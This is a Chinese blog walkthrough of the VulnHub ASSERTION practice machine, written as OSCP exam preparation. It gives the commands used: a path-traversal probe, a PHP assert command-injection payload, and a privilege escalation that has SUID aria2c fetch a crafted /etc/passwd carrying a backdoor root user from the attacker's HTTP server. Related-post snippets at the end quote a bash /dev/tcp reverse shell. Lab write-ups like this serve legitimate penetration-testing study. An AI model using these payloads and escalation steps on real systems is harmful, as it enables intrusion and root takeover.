靶场实战(17):OSCP备考之VulnHub ASSERTION

最新推荐文章于 2024-06-16 13:15:43 发布
最新推荐文章于 2024-06-16 13:15:43 发布
阅读量974 收藏 23
点赞数 17
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53721197/article/details/135639179
版权

打靶思路

  1. 资产发现

    1. 主机发现

    2. 服务发现

  2. 漏洞发现(获取权限)

    1. 80端口/HTTP服务

      1. 组件漏洞

      2. URL漏洞

  3. 提升权限

    1. www-data用户

      1. sudo

      2. suid

1、资产发现

1.1、主机发现

本次靶场ASSERTION[1]指定IP,不涉及主机发现过程。

1.2、服务发现

使用命令sudo -u root nmap 172.16.33.99 -n -Pn -p- --reason -sV -sC -O发现主机开放的端口、提供的服务、使用的组件、组件的版本。

376320d7f37a370f851477c905e2a4e3.png

开放的端口

提供的服务

使用的组件

组件的版本

22/tcp

ssh

OpenSSH

7.6p1

80/tcp

http

Apache httpd

2.4.29

-

os

Ubuntu Linux

?

2、漏洞发现(获取权限)

2.1、80端口/HTTP服务

2.1.1、组件漏洞

0x01、Web中间件

使用命令searchsploit Apache httpd 2.4.未发现Web中间件Apache httpd 2.4.29的Nday漏洞。

eb082bdec382dec401cfeab48fe31bda.png

0x02、Web框架

使用浏览器插件Wappalyzer未发现存在Nday漏洞的Web框架。

43ef6270d93ba1e1ed678cffc17afac6.png

2.1.2、URL漏洞

0x01、直接访问

浏览器打开http://172.16.33.99/,是个健身网站。虽然导航栏有多个地址,但内容都是相同的。

260d33692733e9b30954e3ce4fb7241f.png

网站中的表单只有前端样式,没有后端交互,不会存在SQLi、XSS等漏洞。

036fe817fd07aaaee0a763cd38212751.png

网站的/index.php页面存在参数?page=contact,可能存在路径遍历或文件包含漏洞,轻则造成任意文件读取,重则造成远程代码执行。使用Payload?page=../../../../../etc/passwd进行探测,发现被拦截了,看来得绕过或用其它Payload。

782b038cf1f8c9cf50e56af745ac3b62.png

67cd3fa520fade624a21dc689c62da30.png

逐个尝试HackTricks[2]中的绕过方法和其它Payload,发现assert这里描述的情况和靶机很像,使用Payload' and die(system("whoami")) or '发现可以成功执行,看来存在远程代码执行漏洞。

cedfceedc8582a95415a0deed954c99b.png

47dffc641be3db7f6f18673e5a359df4.png

但是构造反弹shell时却失败,BurpSuite抓包查看原来是Payload中的&被当成了参数连接符,需要先进行编码。使用BurpSuite的Decoder对Payload进行URL编码,最终成功拿到www-data用户的权限。

bae815335622ab92b5e0d8c051519a94.png

832212e5de5b2464232fce1ace2064f4.png

3157bd9343216b8c2afddd35a75b4995.png

408ef07b1a9ae9d495ff6231220009a1.png

0x02、目录扫描

使用命令dirsearch -u http://172.16.33.99/ -x 403未发现有价值的目录或文件,换一个字典,使用命令gobuster dir -u http://172.16.33.99/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt仍然无有价值的发现。

b2656ae1e441876191a10ac7607387a8.png

c885e09a78e15fab4cafcbef860cf45e.png

0x03、模糊测试

基于目前已知情况,没有对网站的目录和文件进行FUZZ的必要。

0x04、切换协议

尝试HTTPS协议,浏览器访问https://172.16.33.99:80/无法打开,看来网站没用SSL。

64bc0b42980db15421541362d976c69f.png

3、提升权限

3.1、www-data用户

3.1.1、sudo

使用命令which pythonwhich python3发现靶机上两个Python命令都有,使用命令python3 -c 'import pty; pty.spawn("/bin/bash")'获得交互式shell。

使用命令sudo -l查看当前用户能以谁的权限执行什么命令,结果因为没有当前用户的密码,所以无法查看。

49b08602bf864635904ebb641cd41d71.png

3.1.2、suid

使用命令find / -perm -u=s -type f -ls 2>/dev/null查看哪些命令在执行时会以该命令属主的权限执行,发现还挺多。

逐个在GTFOBins[3]查询能否用于提权,发现/usr/bin/aria2c命令在允许默认的sh shell以suid权限运行的系统中可以用于提权。测试一下EXP,结果提权失败。

2ce1ef64ecced235dfd8678932f4e855.png

302ba147b53e6e9f5864dc5874834ef8.png

83cb5f5e1d80474adef59e055a6f9046.png

e4badb68ef3b2f306eb815f631e319a6.png

查阅资料得知aria2c是文件下载工具,提权EXP的原理是构造下载报错从而以命令属主root的权限触发报错状态指向的提权代码,进而获得命令属组root的权限。虽然靶机系统不允许默认的sh shell以suid权限运行,所以EXP提权失败,但是我们能否以命令属组root的权限下载一份我们植入了特权用户和密码的/etc/passwd文件,通过覆盖旧的/etc/passwd文件完成特权用户添加,从而获得提权呢?

在靶机上使用命令cat /etc/passwd打印/etc/passwd文件内容后copy下来,在本地使用命令openssl passwd -6 -salt salt password获得密码password的加盐哈希格式,并使用命令vim passwd将密码与刚才获取到的/etc/passwd文件合并,起个用户名hacker。最后使用命令python3 -m http.server开启HTTP服务,提供给靶机下载该passwd文件。

e849914cd9cbdcb079d50e9c0687b300.png

b0f188ba19c0a34ebeafed4e29513f91.png

在靶机上进入/etc目录后,使用命令/usr/bin/aria2c http://10.8.0.110:8000/passwd下载passwd文件,结果因为/etc/passwd文件已经存在所以被保存成了/etc/passwd.1文件,这不行呀。

查阅文档aria2c[4]发现可以使用参数--allow-overwrite [true|false]强制覆盖,使用命令/usr/bin/aria2c http://10.8.0.110:8000/passwd --allow-overwrite=true下载并成功利用root用户的权限覆盖了旧的/etc/passwd文件,变相向/etc/passwd文件中添加了后门特权用户。

314a4d35cbfea4a853768da4657a0001.png

8fd5279f877d581f86bb0484182dbe23.png

b0a620f10444577e716118b3aac531a6.png

但是使用命令ssh hacker@172.16.33.99和密码password一直无法登录,在反复检查openssl命令和passwd文件没有错误后,猜测是SSH服务配置了特权用户禁止密码远程登录,所以尝试使用命令su hacker和密码password切换到hacker用户,最终成功拿到root权限。

bd059c289af09dabca5c847c973d122a.png

9d9a4f906964de8fb7a562d23d8bab3d.png

参考资料

[1]

ASSERTION: https://www.vulnhub.com/entry/assertion-101,495/

[2]

HackTricks: https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-via-phps-assert

[3]

GTFOBins: https://gtfobins.github.io

[4]

aria2c: https://aria2.github.io/manual/en/html/aria2c.html#advanced-options

OneMoreThink
关注
OSCP靶场7-Assertion(目录穿越、命令执行、aria2c提权)
墨痕诉清风的博客
06-07 277
扫描和枚举我们将从扫描目标机器上的开放端口和服务开始,并记住将结果存储在某个地方以便我们可以返回它。还要记住,最好使用 -p- 标志检查所有端口以防万一。-p- *目标 ip* > nmapPn - 这是告诉 nmap 正在扫描的目标已启动并正在运行,因此不必担心检查是否已启动。sV – 检查端口以确定服务/版本sC – 使用脚本检查漏洞只打开了两个端口,这可能好,也可能不好。以防万一我也运行 udp 扫描。UDP 方面似乎没有什么突出的。查看 http 站点,有一件事引起了我的注意。
Vulnhub:Assertion-1.0.1靶机
qq_43884092的博客
03-07 223
aria2c是一个用来下载文件的程序,先保存目标/etc/passwd到本地添加一个新用户,之后使用aria2c覆盖目标/etc/passwd。本地开启http服务,让目标下载修改好的passwd并覆盖的passwd。查看index.php源码发现包含其他文件。尝试包含/etc/passwd发现存在限制。靶机:192.168.111.218。payload需要进行url编码。修改为构造好的payload。保存到本地后修改文件。
oscp学习(一)
qq_48514193的博客
02-20 1870
oscp
OSCP备考分享
一杯咖啡的渗透记忆
10-10 1668
先说说个人的情况。首先,我并不能算作严格意义上安全科班出身,属于半路出家做安全。一直以来都是从事甲方安全防护,偏重基于业务侧的应用安全、数据保护、隐私合规。渗透测试于我几乎是盲区一样的存在,仅对web、android的安全测试有些许了解,比如漏洞原理、防护、测试等,利用层面都很少接触。​ 起初是从之前的同事那里了解到CEH,一个偏重攻击实操的认证,但是考试需要去香港,觉得比较麻烦就放弃了。之后一段时间也没计划学习渗透的知识,随着工作越来越久,逐渐体会到”不知攻,焉知防“的意思。
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
OSCP 学习:Kali Linux 基本命令
bdfcfff77fa的博客
07-26 412
Bash中的交互shell的行为是由位于/etc/bash.bashrc中的系统范围的bashrc文件决定的。可以通过编辑位于任何用户的主目录中的.bashrc文件来覆盖系统范围内的Bash设置。(现在都在.zshrc )
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 726
secret.txt获得ssh私钥,suid提权
OSCP:OSCP考试材料
05-01
【标题】"OSCP: OSCP考试材料"指的是Offensive Security Certified Professional的备考资源,这是一个高级的渗透测试认证,旨在证明个人在网络安全攻击与防御方面的技能。OSCP认证由Offensive Security公司颁发,...
OSCP:OSCP的东西
05-11
OSCP OSCP的东西 此仓库中的大多数内容仅供临时使用。 它的编码很差,但是可以完成工作... 我看到你们的人们开始盯着这个叉起来了……对您的警告:放弃所有希望,进入这里的你们…… 我目前正在对该Repo进行大修...
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型及答题技巧 0x0009-windows提权笔记 0x0011-lab报告模板 0x0013-考试报告模板_v1 0x0014-考试报告模板_v2 0x0020-国外培训视频 windows提权笔记
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
oscp渗透测试认证该从哪里学起
weixin_70101757的博客
02-23 560
而是直接开始实验室,我用的方法是进行全子网扫描,帮助我快速识别实验室机器上的服务,可以深入了解扫描方法。不要搜索MySql 5.x.x版本的漏洞,而是键入“github MySql 5.x.x漏洞”,当你看到前面的POC和脚本时,你会感到非常震惊。备考的伙伴是在机构报名后的学员群里聊得来的朋友,因为大家的进度都一样,顺便还能在课后一起复盘整套知识点。如果你能获得70分,你就处于一个好的位置,接下来用OSCP报告模板练习写报告,练习报告将帮助您了解笔记的哪些方面需要改进。省去麻烦,禁用烦人的防火墙。
一文带你了解OSCP 2024
最新发布
白帽黑客佳哥的博客
06-16 3751
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
oscp练习目录
王嘟嘟的博客
01-25 1万+
0x00 前言 这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。 0x01 vulnhub总览 题目 链接 文章链接 Me and My Girlfriend 1 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ https://blog.csdn.net/qq_36...
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP学习笔记总结(本资料禁止转载)
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值